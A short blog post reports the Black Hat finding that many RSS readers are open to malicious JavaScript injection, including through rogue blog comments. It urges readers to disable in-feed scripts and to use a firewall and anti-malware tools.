More bad news from the Las Vegas Black Hat Convention, this time for the blogging community. Most RSS reader software is vulnerable to malicious JavaScript insertion attacks, and web based readers are not immune either. With typical JavaScript based attacks targeting passwords and personal data, it is something that should be taken seriously, Yet when I did a quick pop quiz amongst family and friends, not a single one (those in the IT security business apart) was aware that such software was a potential risk.
The fact that this kind of attack can be easily launched from even a trusted site, by way of blog commenting with rogue code included, makes it all the more dangerous. It is not something restricted to rogue bloggers by any means.
Although it is easy to lay the blame at RSS reader software developers for not building in better security checks from day one, the real problem runs deeper than that. The root of the problem is, it has to be said, not RSS software at all but rather the lack of understanding of IT security at its most basic of levels, and an apparent inability for the average user to realize the very real risk to their very real personal data by not getting it.
If you can, then disable script and applets from in-feed launching.
Combining this with general safe computing practice, including running a firewall and anti-malware scanners, represents the best defense.